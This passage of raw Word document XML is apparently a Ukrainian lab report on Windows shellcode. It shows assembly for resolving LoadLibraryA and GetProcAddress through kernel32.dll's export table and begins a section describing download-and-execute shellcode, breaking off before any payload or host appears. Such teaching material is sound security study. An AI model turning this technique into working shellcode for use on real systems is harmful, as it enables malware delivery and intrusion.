      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x3c9 = 0x3c8 + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21008335" w14:textId="77777777" w:rsidR="003A711D" w:rsidRDefault="003A711D" w:rsidP="00E55437">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E5C72E3" w14:textId="1F3FC34B" w:rsidR="000241A1" w:rsidRPr="003A711D" w:rsidRDefault="000241A1" w:rsidP="00E55437">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>О</w:t>
      </w:r>
      <w:r w:rsidR="00074F53">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">тже, </w:t>
      </w:r>
      <w:r w:rsidR="00AE306B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">порядковий номер </w:t>
      </w:r>
      <w:r w:rsidR="00B365A1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>знаходится таким чином:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0C60DA" w14:textId="77777777" w:rsidR="00491877" w:rsidRPr="00491877" w:rsidRDefault="00491877" w:rsidP="004918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49187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Find ordinal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EC6A21" w14:textId="77777777" w:rsidR="00491877" w:rsidRPr="00491877" w:rsidRDefault="00491877" w:rsidP="004918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49187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49187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ax</w:t>
      </w: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49187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</w:p>
    <w:p w14:paraId="55B05339" w14:textId="77777777" w:rsidR="00491877" w:rsidRPr="00491877" w:rsidRDefault="00491877" w:rsidP="004918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49187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49187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49187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NameOrdinals]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68758660" w14:textId="77777777" w:rsidR="00491877" w:rsidRPr="00491877" w:rsidRDefault="00491877" w:rsidP="004918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49187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49187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5</w:t>
      </w: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49187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idxName]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB0F473" w14:textId="77777777" w:rsidR="00491877" w:rsidRPr="00491877" w:rsidRDefault="00491877" w:rsidP="004918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49187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49187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x</w:t>
      </w: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</w:t>
      </w:r>
      <w:r w:rsidRPr="0049187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491877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</w:t>
      </w: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* </w:t>
      </w:r>
      <w:r w:rsidRPr="0049187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5</w:t>
      </w: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]        </w:t>
      </w:r>
      <w:r w:rsidRPr="0049187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Ordinal = Name index + Base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429EEF57" w14:textId="77777777" w:rsidR="00491877" w:rsidRPr="00491877" w:rsidRDefault="00491877" w:rsidP="004918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49187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dd</w:t>
      </w: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49187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ax</w:t>
      </w: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49187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iBase]         </w:t>
      </w:r>
      <w:r w:rsidRPr="00491877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Base is a value of the 1st ordinal (it can be 1, 2, ... N)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6650B757" w14:textId="77777777" w:rsidR="00491877" w:rsidRPr="00491877" w:rsidRDefault="00491877" w:rsidP="004918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491877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49187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491877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iOrdinal], </w:t>
      </w:r>
      <w:r w:rsidRPr="00491877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ax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7698DE" w14:textId="77777777" w:rsidR="00B437C2" w:rsidRPr="00D946F6" w:rsidRDefault="00B437C2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6846CC8D" w14:textId="6F6277E5" w:rsidR="00EE69DF" w:rsidRDefault="001E41E1" w:rsidP="00A82D29">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00234FF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00230550" w:rsidRPr="00234FF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. Пошук </w:t>
      </w:r>
      <w:r w:rsidR="00A153E2" w:rsidRPr="00234FF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>адреси</w:t>
      </w:r>
      <w:r w:rsidR="00230550" w:rsidRPr="00234FF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> LoadLibraryA.</w:t>
      </w:r>
      <w:r w:rsidR="00677A82" w:rsidRPr="00234FF3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A225B3" w14:textId="6357301A" w:rsidR="00DA7E01" w:rsidRPr="00DA7E01" w:rsidRDefault="0037237E" w:rsidP="00A82D29">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00DA7E01">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00DA7E01">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DA7E01" w:rsidRPr="00D946F6">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>AddressOf</w:t>
      </w:r>
      <w:r w:rsidR="00D76753" w:rsidRPr="00D946F6">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>Function</w:t>
      </w:r>
      <w:r w:rsidR="00B36082" w:rsidRPr="00D946F6">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00DA7E01">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> – це масив, кожний елемент якого</w:t>
      </w:r>
      <w:r w:rsidR="00DA7E01" w:rsidRPr="00DA7E01">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA7E01">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">є </w:t>
      </w:r>
      <w:r w:rsidR="00DA7E01" w:rsidRPr="00D946F6">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>RVA</w:t>
      </w:r>
      <w:r w:rsidR="00DA7E01" w:rsidRPr="00C77B59">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D7338">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>функції</w:t>
      </w:r>
      <w:r w:rsidR="00DA7E01">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> і займає 4 байти. Знайдемо </w:t>
      </w:r>
      <w:r w:rsidR="00DA7E01">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RVA</w:t>
      </w:r>
      <w:r w:rsidR="0067492A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DA7E01">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadLibrary</w:t>
      </w:r>
      <w:r w:rsidR="00DA7E01">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7B336A" w14:textId="55AAD883" w:rsidR="001D1415" w:rsidRPr="00B54487" w:rsidRDefault="00DA0AE3" w:rsidP="00A82D29">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B54487">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dd</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76753">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B54487">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76753">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">32 + </w:t>
      </w:r>
      <w:r w:rsidR="00B362B4" w:rsidRPr="00D76753">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>990</w:t>
      </w:r>
      <w:r w:rsidR="00B362B4" w:rsidRPr="00B54487">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00B362B4" w:rsidRPr="00D76753">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76753">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> + 4 * (3</w:t>
      </w:r>
      <w:r w:rsidRPr="00B54487">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76753">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>9 - 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644B5724" w14:textId="4E76CFB7" w:rsidR="00A82D29" w:rsidRPr="00A82D29" w:rsidRDefault="000D4282">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F0B8323" wp14:editId="37B29F85">
            <wp:extent cx="5057143" cy="628571"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="1871246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467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31C6" w14:textId="77777777" w:rsidR="006238B6" w:rsidRDefault="006238B6" w:rsidP="00814084">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2775E059" w14:textId="7F865021" w:rsidR="0061243A" w:rsidRPr="0061243A" w:rsidRDefault="0061243A" w:rsidP="00814084">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Отже, адреса</w:t>
      </w:r>
      <w:r w:rsidR="000E59D5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000E59D5" w:rsidRPr="000E59D5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>LoadLibraryA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> знаходится таким чином:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4823ABB0" w14:textId="77777777" w:rsidR="003718ED" w:rsidRPr="003718ED" w:rsidRDefault="003718ED" w:rsidP="003718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3718ED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Find address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7E6D4F" w14:textId="77777777" w:rsidR="003718ED" w:rsidRPr="003718ED" w:rsidRDefault="003718ED" w:rsidP="003718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3718E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3718E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ax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3718ED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</w:p>
    <w:p w14:paraId="5C343887" w14:textId="77777777" w:rsidR="003718ED" w:rsidRPr="003718ED" w:rsidRDefault="003718ED" w:rsidP="003718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3718E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3718E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3718E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Functions]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A698229" w14:textId="77777777" w:rsidR="003718ED" w:rsidRPr="003718ED" w:rsidRDefault="003718ED" w:rsidP="003718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3718E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3718E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5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3718E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iOrdinal]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB3470C" w14:textId="77777777" w:rsidR="003718ED" w:rsidRPr="003718ED" w:rsidRDefault="003718ED" w:rsidP="003718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3718E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ub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3718E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5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3718E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iBase]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B95D45" w14:textId="77777777" w:rsidR="003718ED" w:rsidRPr="003718ED" w:rsidRDefault="003718ED" w:rsidP="003718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3718E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3718E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ax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</w:t>
      </w:r>
      <w:r w:rsidRPr="003718E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3718ED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4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* </w:t>
      </w:r>
      <w:r w:rsidRPr="003718E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5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       </w:t>
      </w:r>
      <w:r w:rsidRPr="003718ED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Function RVA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763BE599" w14:textId="77777777" w:rsidR="003718ED" w:rsidRPr="003718ED" w:rsidRDefault="003718ED" w:rsidP="003718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3718E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dd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3718E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ax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3718E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Kernel32]     </w:t>
      </w:r>
      <w:r w:rsidRPr="003718ED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Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E40DFF" w14:textId="77777777" w:rsidR="003718ED" w:rsidRPr="003718ED" w:rsidRDefault="003718ED" w:rsidP="003718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3718E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3718E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3718E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Function], </w:t>
      </w:r>
      <w:r w:rsidRPr="003718E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ax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4534AD83" w14:textId="77777777" w:rsidR="00814084" w:rsidRPr="00AA1379" w:rsidRDefault="00814084">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DB927A3" w14:textId="6E6BC494" w:rsidR="00523806" w:rsidRPr="005055D1" w:rsidRDefault="005055D1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Адреса </w:t>
      </w:r>
      <w:r w:rsidRPr="0070678D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>GetProcAddress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00335A5D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>шукається</w:t>
      </w:r>
      <w:r w:rsidR="00BB52B9">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>аналогічно</w:t>
      </w:r>
      <w:r w:rsidR="0054106F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00C92DAE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Маючи обидві функції</w:t>
      </w:r>
      <w:r w:rsidR="00B550F4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C92DAE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> можемо </w:t>
      </w:r>
      <w:r w:rsidR="001A6201">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>написати шелкод будь-якої складності.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E74359B" w14:textId="77777777" w:rsidR="00523806" w:rsidRPr="00E531BB" w:rsidRDefault="00523806">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D83C21E" w14:textId="15369311" w:rsidR="00D946F6" w:rsidRDefault="00D946F6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC4831E" w14:textId="1FE6E0C1" w:rsidR="00784B64" w:rsidRPr="00E531BB" w:rsidRDefault="002D3CEF" w:rsidP="00784B64">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE0260">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1) Шелкод завантаження </w:t>
      </w:r>
      <w:r w:rsidRPr="00A51388">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0260">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> запуску на виконання файлу (</w:t>
      </w:r>
      <w:r w:rsidRPr="00A51388">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>download</w:t>
      </w:r>
      <w:r w:rsidR="00CD1B74" w:rsidRPr="00DE0260">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A51388">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>execute</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE0260">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49259723" w14:textId="63A88F57" w:rsidR="00784B64" w:rsidRPr="00784B64" w:rsidRDefault="00784B64">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Файл </w:t>
      </w:r>
      <w:r w:rsidR="00D84BA2">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r w:rsidR="00D84BA2" w:rsidRPr="002339AC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>1_</w:t>
      </w:r>
      <w:r w:rsidR="00D84BA2">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA014A">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA014A">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>asm</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>містить шелкод</w:t>
      </w:r>
      <w:r w:rsidR="00CA014A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, що </w:t>
      </w:r>
      <w:r w:rsidR="00813B15">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>виконує</w:t>
      </w:r>
      <w:r w:rsidR="00CA014A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> наступні дії:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFBF8B6" w14:textId="4DCD9669" w:rsidR="007B5647" w:rsidRPr="00EB3787" w:rsidRDefault="00165205">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00E9460D" w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Зна</w:t>
      </w:r>
      <w:r w:rsidR="00042E00">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ходить</w:t>
      </w:r>
      <w:r w:rsidR="00E9460D" w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE1F3D" w:rsidRPr="00364488">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadLibraryA</w:t>
      </w:r>
      <w:r w:rsidR="00AE1F3D" w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidR="00AE1F3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00AE1F3D" w:rsidRPr="005800CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ernel</w:t>
      </w:r>
      <w:r w:rsidR="00AE1F3D" w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r w:rsidR="00AE1F3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2603189E" w14:textId="1F374A00" w:rsidR="00397D7B" w:rsidRPr="00EB3787" w:rsidRDefault="00397D7B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00EB3787" w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Зна</w:t>
      </w:r>
      <w:r w:rsidR="00EB3787">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ходить</w:t>
      </w:r>
      <w:r w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7EB1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>GetProcAddres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="005800CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E46AFA" w14:textId="77777777" w:rsidR="00405073" w:rsidRPr="00405073" w:rsidRDefault="00405073" w:rsidP="00405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405073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405073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LoadLibraryA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE8FC3F" w14:textId="77777777" w:rsidR="00405073" w:rsidRPr="00405073" w:rsidRDefault="00405073" w:rsidP="00405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405073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40507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ea</w:t>
      </w:r>
      <w:r w:rsidRPr="00405073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40507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  <w:r w:rsidRPr="00405073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szLoadLibraryA]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3121C771" w14:textId="77777777" w:rsidR="00405073" w:rsidRPr="00405073" w:rsidRDefault="00405073" w:rsidP="00405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405073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40507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all</w:t>
      </w:r>
      <w:r w:rsidRPr="00405073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GetKernel32ProcAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ED099F" w14:textId="77777777" w:rsidR="00405073" w:rsidRPr="00405073" w:rsidRDefault="00405073" w:rsidP="00405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405073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40507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405073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40507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405073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LoadLibraryA], </w:t>
      </w:r>
      <w:r w:rsidRPr="0040507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ax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B971537" w14:textId="77777777" w:rsidR="00405073" w:rsidRPr="00405073" w:rsidRDefault="00405073" w:rsidP="00405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405073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405073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GetProcAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E15D3F1" w14:textId="77777777" w:rsidR="00405073" w:rsidRPr="00405073" w:rsidRDefault="00405073" w:rsidP="00405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405073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40507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ea</w:t>
      </w:r>
      <w:r w:rsidRPr="00405073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40507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  <w:r w:rsidRPr="00405073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szGetProcAddress]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3670B325" w14:textId="77777777" w:rsidR="00405073" w:rsidRPr="00405073" w:rsidRDefault="00405073" w:rsidP="00405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405073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40507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all</w:t>
      </w:r>
      <w:r w:rsidRPr="00405073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GetKernel32ProcAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C95702E" w14:textId="77777777" w:rsidR="00405073" w:rsidRPr="00405073" w:rsidRDefault="00405073" w:rsidP="004050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405073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405073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405073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40507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405073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GetProcAddress], </w:t>
      </w:r>
      <w:r w:rsidRPr="00405073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ax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79278C60" w14:textId="77777777" w:rsidR="00841782" w:rsidRDefault="00841782">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="489EF12F" w14:textId="6FD4B5BD" w:rsidR="00E43E7F" w:rsidRPr="00E43E7F" w:rsidRDefault="00E43E7F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Заванта</w:t>
      </w:r>
      <w:r w:rsidR="00E57B92">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>жує</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="005800CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">dll </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6957B853" w14:textId="31858DC0" w:rsidR="00E43E7F" w:rsidRDefault="00EA7927" w:rsidP="007C19BC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
